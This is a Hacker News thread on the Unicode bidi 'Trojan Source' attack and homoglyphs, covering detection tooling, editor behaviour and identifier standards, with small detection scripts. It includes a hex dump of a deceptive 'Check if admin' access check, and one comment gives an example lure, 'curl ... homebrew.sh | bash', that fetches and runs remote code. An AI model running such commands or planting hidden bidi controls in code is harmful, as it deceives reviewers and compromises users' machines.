        
           | robotmay wrote:
           | Ah yes you're right - looks like that can be handled with
           | CSS:
           | https://www.w3.org/International/articles/vertical-text/
           | Although from what I've seen most Japanese websites tend
           | to be left-to-right instead anyway.
           | 
           | Hebrew would be a more valid second example I think. I'd be
           | curious to know how many languages maintain their RTL
           | preference online.
        
             | dhosek wrote:
             | Japanese[1] isn't a right-to-left language, exactly. It
             | can be written horizontally, in which case it's L-R, top
             | to bottom, or vertically, in which case it's top to
             | bottom, with columns running R-L, but functionally, this
             | is still like L-R typesetting, just with the characters
             | rotated 90° CCW and the pages then read in the same order
             | as pages in an R-L book. This is typical of manga, which
             | is why there might have been confusion by the OP about
             | the directionality of Japanese.
             | 
             | [1] All of this also applies to Chinese and Korean.
             | Interestingly, traditional Mongolian script is also written
             | vertically, but in columns left to right rather than right
             | to left.
        
         | capitainenemo wrote:
         | This doesn't feel particularly new either? Isn't it pretty much
         | a new variant of https://github.com/reinderien/mimic ?
         | 
         | Which, if one is suspicious of code, can be defeated in vim
         | with: set encoding=latin1
        
         | specialist wrote:
         | > _It 's certainly a good lesson in not copy/pasting random
         | snippets from the internet..._
         | 
         | For someone with more gumption than me:
         | 
         | Future copy & paste will by default have intermediate
         | screenshot and OCR steps. Voila: charset scrubbing for free.
         | 
         | Why not? Already today misc UIs and renderings disallow text
         | selection. Drives me nuts.
        
           | kevin_thibedeau wrote:
           | This is too complicated for a personal supercomputer to be
           | burdened with. Better to ship everything on the clipboard to
           | a sanitizer service.
        
           | modeless wrote:
           | The future is now. Android has been doing this for years and
           | it's awesome. There's no text you can't copy.
           | 
           | To clarify, by default copy and paste works the normal way,
           | but you can open the app switcher to use the OCR copy/paste
           | which works on non-selectable text too, even in images.
        
             | QuercusMax wrote:
             | There's a way to prevent this - to my great annoyance,
             | health apps (such as the ubiquitous MyHealth variants) and
             | banking apps can prevent you from taking screenshots or
             | copying text. This is presumably to prevent screen-scraping
             | apps from stealing your private data, but it's really
             | annoying when you're trying to screenshot a QR code for
             | some kind of check-in process.
        
               | checkyoursudo wrote:
               | That's why you need a second phone to photograph the
               | screen of the first phone.
        
         | lelandbatey wrote:
         | I was impatient to find the example you were talking about; as
         | far as I can tell, this is the line with the example:
         | https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
         | 
         | And here's what it looks like in various conditions/viewers:
         | 
         | With the fix, this is how it looks in the browser in the Gitlab
         | interface:                   if (accessLevel != "user") { //
         | Check if admin
         | 
         | Without the fix, viewed raw (and thus viewed in a vulnerable
         | way), it looks like this:                   if (accessLevel !=
         | "user") { // Check if admin
         | 
         | And in a hex viewer, it looks like this:
         | 
         |   000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if (acces
         |   000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2  sLevel != "user.
         |   000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069  .. ...// Check i
         |   000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
         |   000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
         |   00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f   console.log("Yo
         |   00000610: 7520 6172 6520 616e 2061 646d 696e 2e22  u are an admin."
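         | 
         | To name the non-ASCII bytes in that dump, a small Python
         | sketch can decode them as UTF-8 and look up the code points.
         | The byte strings are copied from the hex dump; the helper
         | name describe is made up for illustration.

```python
import unicodedata

# Bytes that follow "user" and "Check if admin" in the hex dump.
after_user = bytes.fromhex("e280ae20e281a6")
after_admin = bytes.fromhex("e281a920e281a6")


def describe(raw):
    """Decode UTF-8 bytes and list each code point with its Unicode name."""
    return [
        f"U+{ord(ch):04X} {unicodedata.name(ch, '<unnamed>')}"
        for ch in raw.decode("utf-8")
    ]


for label, raw in (("after user", after_user), ("after admin", after_admin)):
    print(label, describe(raw))
```

         | So the string literal does not end where it appears to: an
         | override and isolates sit between "user" and the closing
         | quote, which only comes after the comment text.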
        
           | Antwnis wrote:
           | That's a great example ^ that demonstrates exactly how this
           | vulnerability can be easily abused
        
         | smashed wrote:
         | I was intrigued by your meta example and I took a look. It took
         | me 3-4 minutes to find the warning, and I was looking for it!
         | 
         | I was expecting a big fat warning on the merge request itself,
         | or maybe on the lines containing the dangerous chars.
         | 
         | In the end, it is a small ? character inserted where the unicode
         | control chars are, and a mouseover tooltip warning about a
         | potential issue.
         | 
         | The warning is good, but why so subtle? Sorry for the
         | criticism. The feature is still a huge positive.
        
           | robotmay wrote:
           | Thanks for the feedback! Our primary use-case when deciding
           | on it was to flag these up in a code-review situation, to
           | prevent malicious content being submitted in merge requests
           | to unsuspecting projects. We found this made it stand out
           | enough to the reviewer when performing code reviews. I also
           | try to not be too quick to add new alerts or sections to the
           | GUI as we sometimes get criticised for having too much
           | clutter D:
           | 
           | GitHub by comparison went down the alert banner route, from
           | what I can see. I'm not opposed to adding something to that
           | effect as well though - especially for inexperienced
           | reviewers, it would be nice to include some more information
           | about the potential exploit. That could be something we
           | revisit when we add the homoglyph highlighting.
        
         | slim wrote:
         | > this was a royal pain in the arse to figure out if I had
         | live examples in the specs, because vim also just rendered
         | them "correctly"
         | 
         | That's because vim supports Farsi/Arabic natively from day one.
         | Even if the OS does not support it, you can still write
         | bidirectional and right-to-left text in vim. Never knew the
         | reason, but thanks Bram Moolenaar.
        
         | stackbutterflow wrote:
         | > It's certainly a good lesson in not copy/pasting random
         | snippets from the internet and pasting them into a root shell,
         | however
         | 
         | I gotta say that I always make sure that I understand each
         | piece of code that I copy paste but I do copy paste and never
         | thought of this type of attack. Maybe that's something I should
         | pay attention to in the future.
        
           | captaincrunch wrote:
           | From the article, it's likely you'd not even notice - unless
           | you pasted in an ascii only editor that doesn't allow
           | anything other than plain old text.
        
         | acdha wrote:
         | > It'd also likely be pretty frustrating to end users if we
         | were to highlight every single unicode character that looks
         | like the latin alphabet.
         | 
         | Have you tried something similar to what the browsers do where
         | highlighting is only enabled when there are multiple scripts
         | mixed within the same token? Source code seems like it would be
         | harder since you have many tokens rather than just a single one
         | as in a hostname, and I'd be curious how much legitimate usage
         | mixes scripts for technical reasons because you have something
         | like a language or framework convention that certain names
         | start with a particular English-derived term.
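         | 
         | A rough Python sketch of that per-token idea, as an
         | illustration only. Python's standard library has no script
         | property, so this approximates the script by the first word
         | of each character's Unicode name; scripts_in and
         | mixed_script_tokens are made-up names, and browsers use more
         | careful rules than this.

```python
import re
import unicodedata


def scripts_in(token):
    """Approximate the set of scripts in a token from character names."""
    scripts = set()
    for ch in token:
        if ch.isalpha():
            # The first word of the name ("LATIN", "CYRILLIC", ...) stands
            # in for the script property, which the stdlib does not expose.
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def mixed_script_tokens(source):
    """Return identifier-like tokens that mix more than one script."""
    return [tok for tok in re.findall(r"\w+", source) if len(scripts_in(tok)) > 1]


# Hypothetical input: the second is_admin uses Cyrillic U+0430 for "a".
source = "is_admin = check(is_\u0430dmin)"
print(mixed_script_tokens(source))
```

         | A token written entirely in one script is not flagged, which
         | is the property that would keep noise down for non-English
         | codebases.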
        
           | robotmay wrote:
           | So far we're just detecting individual bidi characters, but
           | looking at characters in their greater context could be quite
           | interesting. This would seem like quite a good use-case for
           | machine-learning too, if you wanted to get super into it.
        
         | jhgb wrote:
         | > It'd also likely be pretty frustrating to end users if we
         | were to highlight every single unicode character that looks
         | like the latin alphabet.
         | 
         | That actually strikes me as very desirable. (Especially in
         | light of the old maxim that "programs must be written for
         | people to read, and only incidentally for machines to
         | execute".)
        
           | grishka wrote:
           | Latin C and Cyrillic С aren't the same letter. The latter is
           | actually an "s". It would be a pain in the ass to work with
           | strings if those Cyrillic letters that look like their Latin
           | counterparts reused their codepoints. Imagine having to
           | convert "M" to lowercase. Would that return "m" or "м"? Same
           | for "H", "h" or "н"?
           | 
           | And, actually, there was some really really cursed Soviet
           | encoding that did this to save bits. The Russian railway
           | company still uses it[1] to this day.
           | 
           | [1] https://habr.com/ru/post/547820/
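           | 
           | A short Python sketch of the lowercase point: because the
           | lookalike capitals have separate code points, each one
           | maps to its own lowercase letter. The pairs list is just
           | an illustrative selection.

```python
import unicodedata

# Latin capital and its Cyrillic lookalike (U+041C EM, U+041D EN).
pairs = [("M", "\u041c"), ("H", "\u041d")]

for latin, cyrillic in pairs:
    for ch in (latin, cyrillic):
        lower = ch.lower()
        print(f"{unicodedata.name(ch)} -> U+{ord(lower):04X} {unicodedata.name(lower)}")
```

           | With shared code points, lower() would have no way to pick
           | between the two results.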
        
             | gambas99 wrote:
             | > there was some really really cursed Soviet encoding
             | 
             | I know at least 10 stories that start like this
        
             | jhgb wrote:
             | > Latin C and Cyrillic С aren't the same letter.
             | 
             | Well, as a moderately old Czech, I'm somewhat familiar with
             | Cyrillic. They kind of used to force it on us in schools.
        
           | wizzwizz4 wrote:
           | Those Unicode characters aren't just there for show. They're
           | part of real scripts that real people use; it would be
           | annoying for people using those scripts.
        
             | jhgb wrote:
             | I'm fairly sure this could be arranged for. As in, if
             | there's too many of them belonging to the character set of
             | a particular language, then it's very likely that it's
             | simply a text in that language. But random characters in
             | the middle of ASCII identifiers are _probably_ not
             | something that you want.
        
               | robotmay wrote:
               | Yeah I'm not opposed to adding highlighting to them, and
               | we are investigating how to do it, but it was less clear-
               | cut than the bidi characters (which are totally invisible
               | when rendered). I think we'll want to make it a bit more
               | configurable and probably a separate option to the one
               | which highlights the bidi characters.
        
             | R0b0t1 wrote:
             | This type of attack isn't new. I can't recall the names but
             | there are afair multiple C/C++ coding standards that limit
             | everything to ASCII to avoid precisely this attack, but
             | also others with visually similar but nonequivalent names.
        
             | pas wrote:
             | Yes, and they should be in well annotated/marked
             | string/data sections, not in logic code.
        
             | JoshTriplett wrote:
             | Exactly. When we were adding support for non-ASCII
             | identifiers to Rust, and thinking about homoglyphs and
             | confusable characters, we needed to evaluate the tradeoffs
             | between catching such characters and inconveniencing the
             | speakers of various languages who want to write Rust in
             | their language.
        
       | Pxtl wrote:
       | I skimmed the article but I didn't see any examples of this being
       | exploited... Has anybody done a proof of concept on how Bidi can
       | be used? I'm having trouble thinking of a line of code with a
       | comment or literal where the code is legit forwards but malicious
       | backwards.
        
       | akersten wrote:
       | It is wrong to call this a bug, this is a _feature_ of Unicode
       | and very intentional. Whether we should have thought about that
       | when allowing parsers to digest anything outside of ASCII is the
       | real question. The answer is probably "IDEs and compilers should
       | ignore character-direction codes when looking at source files."
       | But that doesn't solve homoglyph attacks (and other undiscovered
       | deception). What a fun can of worms. Who gets to solve it?
        
         | zeepzeep wrote:
         | > "IDEs and compilers should ignore character-direction codes
         | when looking at source files."
         | 
         | No I think some people would disagree, arabic coders for
         | example. People just need to be aware of this when using
         | unicode in their product.
        
           | samus wrote:
           | Editors and code views should definitely show when BiDi and
           | other interesting Unicode features are used, just like they
           | already do with spaces and zero-width whitespaces. These
           | features should definitely work, but they are a liability if
           | they can also be used to mislead human users.
           | 
           | Compiler maintainers need to update the syntax rules to
           | restrict free mixing of unicode characters. Similar
           | restrictions were already adopted in domain names.
        
         | kingcharles wrote:
         | You're right - their headline is written for attention. It's an
         | exploit of a feature.
         | 
         | What I'm interested to know is whether there is any code
         | already out there in the wild with this exploit in it? An
         | intelligence service could have exploited this years ago
         | without anyone noticing until now.
         | 
         | Unicode is a pathway to all manner of hijinks, including as you
         | say, homoglyph attacks. For instance, on some TLDs I can easily
         | create two different domain names that render identically in
         | the browser.
        
           | comex wrote:
           | > What I'm interested to know is whether there is any code
           | already out there in the wild with this exploit in it?
           | 
           | It's possible, but I doubt it. The paper mentions that Vim
           | isn't vulnerable to the bidirectional attack. Not mentioned
           | in the paper: neither is `less`, the pager, which is used by
           | default for `git diff` and other Git commands. Nor are either
           | of the first two terminals I tried, when `cat`ing the file
           | without a pager.
           | 
           | All of the aforementioned programs display the direction
           | markers as either escape sequences highlighted in bright
           | colors, or garbage characters, both of which stand out
           | visually like a sore thumb. Now, that's more a sign of poor
           | Unicode support in those programs than it is anything to
           | their credit. But it does mean that this kind of attack is
           | incredibly brittle, at least in any codebase where some
           | people working on it are likely to be using Unix tools.
           | There's a high chance the aberrant characters will be spotted
           | at some point or other.
           | 
           | And once spotted, it's self-evident that it's an attack. I
           | suspect real attacks would try to be more subtle, introducing
           | bugs that could pass as genuine mistakes, at least at first
           | glance.
        
             | kingcharles wrote:
             | It's sad that large-scale exploitation of this is stopped
             | only because many applications still have really poor
             | Unicode support and would therefore make the changes human-
             | visible.
        
               | Groxx wrote:
               | Coding editors also often show this kind of thing
               | intentionally, as those characters are meaningful for
               | interpretation purposes. Many of them are very UTF
               | friendly, but they still show zero-width spaces as e.g.
               | "<zwsp>" _on purpose_.
               | 
               | They've also often shown non-printable ASCII control
               | characters for basically forever. Null bytes and \bel and
               | whatnot are very important despite being "invisible", and
               | they've been around for decades.
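               | 
               | A minimal Python sketch of that kind of display, not
               | taken from any particular editor: it swaps format (Cf)
               | and control (Cc) characters for a visible tag. The
               | function name reveal and the tag format are made up
               | for illustration.

```python
import unicodedata


def reveal(text):
    """Replace format (Cf) and control (Cc) characters with visible tags."""
    out = []
    for ch in text:
        if ch in "\n\t":
            out.append(ch)  # keep ordinary layout characters as they are
        elif unicodedata.category(ch) in ("Cf", "Cc"):
            out.append(f"<U+{ord(ch):04X}>")
        else:
            out.append(ch)
    return "".join(out)


# Zero-width space, BEL and a right-to-left override all become visible.
print(reveal("a\u200bb"))
print(reveal("ring\x07"))
print(reveal('"user\u202e'))
```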
        
               | tetha wrote:
               | I've been bitten by things like this from an entirely
               | unexpected angle - messengers like teams and skype
               | sometimes <helpfully> replace characters like "-" and " "
               | with all manner of more readable unicode characters. More
               | readable, until the YAML parser choked.
               | 
               | Since that, I pretty much always run some variant of the
               | gremlins plugin, which highlights pretty much all unicode
               | spaces, dashes and other weird control symbols.
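               | 
               | Roughly the same check can be sketched in Python. This
               | is not how the gremlins plugin works, just an
               | illustration that flags non-ASCII characters in the
               | space separator (Zs) and dash punctuation (Pd)
               | categories; the function name is made up.

```python
import unicodedata


def lookalike_spaces_and_dashes(text):
    """List (index, code point, name) for non-ASCII spaces and dashes."""
    hits = []
    for index, ch in enumerate(text):
        if ord(ch) > 127 and unicodedata.category(ch) in ("Zs", "Pd"):
            hits.append((index, f"U+{ord(ch):04X}", unicodedata.name(ch)))
    return hits


# Hypothetical pasted YAML line with a no-break space and an en dash.
pasted = "key:\u00a0value \u2013 x"
for hit in lookalike_spaces_and_dashes(pasted):
    print(hit)
```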
        
               | Groxx wrote:
               | Chat apps replacing (tm) with a horrifically large,
               | poorly-rendered and off-colored "TM" and ruining The
               | Joke(tm) is a major pet peeve of mine, yeah :| And even
               | worse, it seems to be spreading, as each one blindly
               | copies the horrible decisions of the others. I would
               | disable all of those auto-replacements everywhere _if
               | only I could disable all of those auto-replacements
               | everywhere_.
        
               | powersnail wrote:
               | I think making these chars human visible is a feature.
               | Most code editors have features like showing invisible
               | characters, displaying some representation of white space
               | characters, or highlighting control sequences.
               | 
               | Because the editor is supposed to edit plain text, which
               | means all characters must be editable. And a character
               | can only be editable if it is visible.
        
             | josephcsible wrote:
             | > Now, that's more a sign of poor Unicode support in those
             | programs than it is anything to their credit.
             | 
             | But that behavior is intentional. If you want, you could do
             | "alias less='less -r'", and then it would behave the way
             | you want, and you'd become vulnerable to this attack.
        
               | comex wrote:
               | -r makes it pass all control characters to the terminal.
               | To quote less's man page:
               | 
               | > Warning: when the -r option is used, less cannot keep
               | track of the actual appearance of the screen (since this
               | depends on how the screen responds to each type of
               | control character).
               | 
               | This is not the same as actually supporting (i.e. being
               | able to keep track of the screen state for) bidirectional
               | text that may legitimately use those characters.
               | 
               | For that matter, the terminal may not support it either,
               | as I mentioned.
               | 
               | Though, today I learned there has been some effort in
               | recent years to improve bidirectional text handling in
               | terminals and terminal applications, generally:
               | 
               | https://www.reddit.com/r/linux/comments/dn8uka/bidirectio
               | nal...
        
           | bmn__ wrote:
           | > I can easily create two different domain names that render
           | identically in the browser
           | 
           | You can't (any more)[1]. That worked for a limited amount of
           | time, then mitigations were put in place, and subsequently
           | standardised as part of Unicode. Everyone who deals with
           | implementations of Unicode is supposed to be knowledgeable
           | about the security relevant aspects, you can bet that the
           | people working on browsers definitely are.
           | <http://p3rl.org/perlre#Script-Runs>
           | 
           | [1] invitation to prove me wrong, I am on purpose leaning far
           | out the metaphoric window and will gladly eat my words
        
             | Amorymeltzer wrote:
             | Came here to provide exactly that link (canonical:
             | <https://perldoc.perl.org/perlre#Script-Runs>). For those
             | who figured they'd skip over it, it's pretty neat IMO. Perl
             | 5.28 (released 2018) added a new technique for matching
             | patterns that aren't all from the same Unicode script, a
             | "script run."
             | 
             | >In most places a single word would never be written in
             | multiple scripts, unless it is a spoofing attack. An
             | infamous example, is
             | 
             | >>paypal.com
             | 
             | >Those letters could all be Latin (as in the example just
             | above), or they could be all Cyrillic (except for the dot),
             | or they could be a mixture of the two. In the case of an
             | internet address the .com would be in Latin, And any
             | Cyrillic ones would cause it to be a mixture, not a script
             | run.
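The mixed-script idea quoted above can be sketched outside Perl as well. The following is only an approximation under a stated assumption: Python's standard library does not expose the Unicode Script property, so the first word of each character's name ("LATIN", "CYRILLIC", ...) is used as a stand-in. The helper names `scripts_in` and `is_single_script` are hypothetical, and this is not how Perl implements script runs.

```python
import unicodedata


def scripts_in(word):
    """Approximate the set of scripts used by the letters in `word`.

    Assumption: the first word of the Unicode character name ("LATIN",
    "CYRILLIC", "GREEK", ...) stands in for the Script property.
    """
    found = set()
    for ch in word:
        if ch.isalpha():
            found.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return found


def is_single_script(word):
    """True when all letters in `word` appear to come from one script."""
    return len(scripts_in(word)) <= 1


if __name__ == "__main__":
    latin = "paypal"
    mixed = "p\u0430yp\u0430l"  # U+0430 is CYRILLIC SMALL LETTER A
    print(latin, scripts_in(latin), is_single_script(latin))
    print(mixed, scripts_in(mixed), is_single_script(mixed))
```

Digits and punctuation such as the dot are ignored here, which loosely mirrors the "except for the dot" remark in the quoted documentation.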
        
             | kingcharles wrote:
             | > You can't (any more)[1].
             | 
             | That was my understanding too, until this last week when I
             | figured out you could.
             | 
             | I'm pretty certain this: and this: are the same rendering,
             | but are different Unicode, and I can register them both as
             | domain names under some TLDs. Google displays them the same
             | in their result pages too.
        
               | bmn__ wrote:
               | I examined closely and found both are exactly the same, a
               | perfectly valid Latin script run and equivalent to the
               | expression in escape notation
               | "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".
               | > perl -C -E'print
               | "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
               | 0000  74 68 69 73 3a
               | this:
               | 
               | HN software likely ate the relevant details you wanted to
               | show, can you please try again and use a notation that
               | survives the HN filter?
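One notation that survives most text filters is a plain list of code points. A minimal sketch of producing it, with `codepoints` as a hypothetical helper name:

```python
def codepoints(text):
    """Render every character as U+XXXX so nothing is hidden by rendering."""
    return " ".join(f"U+{ord(ch):04X}" for ch in text)


if __name__ == "__main__":
    print(codepoints("this:"))        # plain ASCII
    print(codepoints("th\u200bis:"))  # looks the same, has a zero-width space
```

For the plain string this prints `U+0074 U+0068 U+0069 U+0073 U+003A`, matching the hex dump above; any hidden character would show up as an extra entry.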
        
               | kingcharles wrote:
               | Try this: https://kingcharles.one/unistrange.html
               | 
               | When I created the file in Notepad it showed the hidden
               | code, but I can register both those as valid domains and
               | Google will show them identically in the SERPs, and
               | Safari will show them both identically in the address
               | bar. Chrome/Edge expands them in the address bar, but
               | will render them the same in HTML. Have not tested on
               | Firefox.
               | 
               | If you View Source in Chrome it won't show the hidden
               | code, but if you open the dev tools it will start to
               | break.
        
             | _3u10 wrote:
             | Doesn't really matter. The major browser is intentionally
             | security compromised, anyway.
             | 
             | If you pay the maker of that browser they'll inject any
             | links you want on most pages on the internet. Just give
             | them the hash of the email / phone number of your target.
             | It helps both economically and passing their security
             | checks if you have more than a thousand victims you want to
             | target.
             | 
             | If you want to fool a developer just host it on a github
             | page. If you want to fool anyone else, just do a decent
             | clone of their page.
             | 
             | If you want it to appear on most major news network sites,
             | just pay $150 for a newswire.
             | 
             | Think about it, if you crafted the right article, maybe
             | about a fork of homebrew etc, and redirected to a github
             | page with a link stating you needed to copy and paste
             | 
             | curl http://github.com/asdkfjas/homebrew.sh | bash
             | 
             | into their terminals how many would do it?
        
           | KennyBlanken wrote:
           | > You're right - their headline is written for attention
           | 
           | That or just ignorance. Krebs has zero training or education
           | in computer science or programming.
        
         | josephcsible wrote:
         | It's a feature for prose text, so programs like Word should
         | support it. It's a security bug in anything designed to be
         | parsed or interpreted by software, so programs like Visual
         | Studio Code should refuse to honor it.
        
           | asddubs wrote:
           | or it should be confined to the marker of the string (i.e.
           | the quotation marks) if you're doing syntax highlighting
           | anyway
        
           | hollerith wrote:
           | Brilliant! Nobody would copy prose, then paste it into a code
           | file or REPL without re-reading it after the paste.
        
         | ximeng wrote:
         | https://github.com/rust-lang/rust/issues/28979 plenty of
         | discussion here on Unicode including homoglyph attacks. This is
         | for Rust but has links to Go and Zig. The Unicode standard also
         | has extensive discussion, for example
         | https://unicode.org/reports/tr31/ and
         | http://unicode.org/reports/tr39/ on identifiers and security.
         | 
         | In general a multilayer solution is needed: compilers, linters,
         | Unicode standard, merge tools, editors, and so on.
        
           | rurban wrote:
           | But they still don't get it right, they explicitly allow not
           | identifiable Unicode identifiers. The C20 committee recently
           | allowed also insecure identifiers, completely ignoring the
           | Unicode identifier guidelines. They stated that nobody cares,
           | everybody wants them and making them secure would need the
           | entire Unicode database. Why do they allow noobs into such
           | committees? What is needed are the normalization tables
           | (tiny), the script list (tiny) and the two xid lists.
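As a rough illustration of how little is needed for part of such a check, Python already exposes the XID rules through `str.isidentifier()` and the normalization tables through `unicodedata`. The sketch below is a stand-in, not what any language committee specifies: `is_safe_identifier` is a hypothetical name, NFKC is chosen only because it is the form Python applies to its own identifiers, and the script-list check mentioned above is left out.

```python
import unicodedata


def is_safe_identifier(name):
    """Accept `name` only if it is a valid identifier and already NFKC-normalized.

    Assumption: Python's own identifier rules (XID_Start / XID_Continue plus
    "_") stand in for the "two xid lists"; other languages differ in detail.
    """
    if not name.isidentifier():
        return False
    return unicodedata.normalize("NFKC", name) == name


if __name__ == "__main__":
    # "\ufb01le" starts with the single-character "fi" ligature (U+FB01).
    for candidate in ["file", "\ufb01le", "2x"]:
        print(repr(candidate), is_safe_identifier(candidate))
```

The ligature spelling is rejected because normalizing it changes the string, so two visually similar spellings cannot both pass.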
        
             | estebank wrote:
             | > they explicitly allow not identifiable Unicode
             | identifiers. [...] They stated that nobody cares, everybody
             | wants them and making them secure would need the entire
             | Unicode database.
             | 
             | Could you elaborate? rustc ships with the entire Unicode db
             | and only allows identifiers with codepoints advertised by
             | Unicode as allowed in identifiers.
             | 
             | The closest to walking off the beaten path is a (still
             | unmerged) parser recovery PR that accepts emojis as
             | identifiers _if and only if_ a parse error would otherwise
             | occur as a way to avoid knock down errors when someone
             | tries to use them.
        
         | Animats wrote:
         | What's needed is to impose on programming languages, outside of
         | comments, checks similar to the checks made for domain names.
         | 
         | There is a draft standard for this.[1] It references RFC 5893
         | and some other documents. Some of the rules:
         | 
         | - All code points in a single label must be taken from the same
         | script as determined by the Unicode Standard Annex #24: Script
         | Names. Exceptions to this guideline are permissible for
         | languages with established orthographies and conventions that
         | require the commingled use of multiple scripts. (Like mixing
         | kanji and romaji in Japanese.)
         | 
         | - The "Bidi rules" of RFC 5893, which define allowed right to
         | left and left to right modes, must be enforced. These are
         | complicated, because of such things as the Arabic and Hebrew
         | convention of right to left text with left to right numeric
         | digits in numbers. But they are well-defined.
         | 
         | - Only code points allowed by IDNA 2008 are allowed. This
         | eliminates such things as the non-breaking zero width space,
         | the expansion areas for future use, and such.
         | 
         | The domain name people have been banging on this problem since
         | 2003, and by now, there's a rough consensus of what to
         | disallow. So start putting checks for that in compilers. If you
         | find violations of those rules, it's more likely to be a typo
         | than something useful, anyway.
         | 
         | So that's a way out of this.
         | 
         | [1] https://www.icann.org/en/system/files/files/draft-idn-
         | guidel...
        
           | varajelle wrote:
           | > What's needed is to impose on programming languages,
           | outside of comments, checks similar to the checks made for
           | domain names.
           | 
             | But this attack works by placing characters inside comments
             | and strings. So these checks would not help prevent this
             | particular attack.
        
             | Animats wrote:
             | They say that, but don't really justify that claim. That's
             | more about string literals that do something other than
             | just display, such as URLs.
        
         | asddubs wrote:
         | browsers have solved it for domain names. you could apply the
         | same heuristics for not mixing e.g. cyrillic and non cyrillic
         | in the same word/file
        
       | a-dub wrote:
       | wasn't there something a while back where people were triggering
       | buffer overflows in terminal emulators with malicious (and
       | invisible to the pretty printed eye) escape codes?
        
       | banana_giraffe wrote:
       | For anyone that wants to see the real code:
       | 
       | https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...
       | 
       | I've not seen one editor yet that doesn't at least hint there's a
       | problem with syntax highlighting, if not just outright show
       | nonsense.
        
       | user2994cb wrote:
       | I'm sure there are some creative uses in C-style comments for
       | U+2215, Division Slash: /
        
       | sqs wrote:
       | Code search is helpful to see if any of your code contains these
       | characters.
       | 
       | A bunch of hits found across the top ~2M open-source
       | repositories:
       | https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
       | 
       | To triage, you probably want to first look at hits in code files
       | (not JSON or Markdown, etc.):
       | 
       | https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
       | 
       | You can set up a self-hosted instance of Sourcegraph to run this
       | across all of your company's code: https://docs.sourcegraph.com/.
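For a single checkout, a local scan gives a similar answer without a search service. This is a minimal sketch: the character set is the explicit bidirectional embeddings, overrides and isolates (U+202A to U+202E and U+2066 to U+2069), and the function names `scan_text` and `scan_tree` are hypothetical.

```python
from pathlib import Path

# Explicit bidirectional formatting characters: embeddings, overrides and
# isolates (U+202A..U+202E and U+2066..U+2069).
BIDI_CONTROLS = {
    chr(cp) for cp in (*range(0x202A, 0x202F), *range(0x2066, 0x206A))
}


def scan_text(text):
    """Yield (line number, column, code point) for each bidi control found."""
    for lineno, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                yield lineno, col, f"U+{ord(ch):04X}"


def scan_tree(root):
    """Print a grep-style hit for every bidi control in UTF-8 files under root."""
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(encoding="utf-8")
        except (UnicodeDecodeError, OSError):
            continue  # skip binaries and unreadable files
        for lineno, col, cp in scan_text(text):
            print(f"{path}:{lineno}:{col}: {cp}")
```

Calling `scan_tree(".")` from the repository root lists hits as `path:line:column: code point`. As with the search above, hits in translation or documentation files are often legitimate and need triage.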
        
       | mwcampbell wrote:
       | > So you can use them in source code that appears innocuous to a
       | human reviewer
       | 
       | To a sighted human reviewer. If I'm not mistaken, a blind
       | programmer using a screen reader would be immune to this trick.
        
         | brazzy wrote:
         | If the screen reader understands Bidi (which it needs to in
         | order to support some languages), maybe not.
        
       | afrcnc wrote:
       | Duplicate: https://news.ycombinator.com/item?id=29061987
        
       | Groxx wrote:
       | Ehhhh... Interesting philosophically, and we might see a
       | practical attack maybe eventually, but most source code editors
       | and diff reviewers that I've encountered show all non-printable
       | characters VERY visibly. Because they matter, and always have -
       | "func asdf()" is very different from "func as<zwsp>df()". If I
       | saw a pile of non-printable control characters intermixed in code
       | in a diff, there's absolutely no way I'd allow that merge.
       | 
       | IOCCC entries will absolutely become more fun though.
        
         | lifthrasiir wrote:
         | > IOCCC entries will absolutely become more fun though.
         | 
         | IOCCC doesn't allow unescaped octets with high bit set [1], so
         | even that's no go.
         | 
         | [1] https://www.ioccc.org/2020/rules.txt (rule 13)
        
           | GlitchMr wrote:
           | Well, technically the rule only talks about entries that
           | "fail to compile". An entry that still compiles is fine, see
           | rule 12. In practice this means that Unicode abuse like this
           | is only allowed in strings.
        
             | lifthrasiir wrote:
             | When the rule was originally introduced in 2001 [1] it was
             | a total ban. It seems that the rule was slightly relaxed in
             | 2013 [2], but I think it still massively discourages any
             | octet >= 128 because there is no portable way to set the
             | input encoding (like GCC `-finput-charset`, which is
             | ignored by Clang AFAIK).
             | 
             | [1] https://www.ioccc.org/2001/rules
             | 
             | [2] https://www.ioccc.org/2013/rules.txt
        
           | Groxx wrote:
           | Aww. But also _of course_ they've already addressed this.
        
           | saagarjha wrote:
           | I am very curious which program abused this and forced the
           | creation of that rule.
        
             | lifthrasiir wrote:
             | Probably 2000/briddlebane [1]. But it is more like a guard
             | against compatibility issues.
             | 
             | [1] https://www.ioccc.org/2000/briddlebane.c vs.
             | https://www.ioccc.org/2000/briddlebane.orig.c
        
         | [deleted]
        
         | Jach wrote:
         | I wouldn't be so sure about visibility since it seems most code
         | editors and programming languages want to support more unicode,
         | not less... One of my hobbies used to be annually running a
         | regex search through the company's millions of lines of java to
         | see how much of an increase there was in non-printable spaces
         | (0x200b) in java method names or other symbols. Eclipse at
         | least wouldn't show them by default, I don't remember
         | IntelliJ's behavior, but most people wouldn't know they were
         | there. I was aware of only one time when it impacted someone
         | who typed in a whole identifier by sight but the reference
         | included a 200b and they were stuck for a bit figuring out why
         | things didn't work.
         | 
         | But I agree the trick (hard to call it an attack or even bug)
         | is fun, in the same way as the earlier tricks of fake filename
         | extensions. And terribly obvious, even with the limitations of
         | default code viewers, and with no plausible deniability once
         | caught, so it's pretty overblown for practical considerations.
         | The intentionally introduced Linux kernel bugs from several
         | months ago were far more significant a lesson for people to
         | learn from, and they didn't rely on any unicode tricks but on
         | much simpler tricks that were also somewhat plausibly deniable
         | to chalk up to an oopsie.
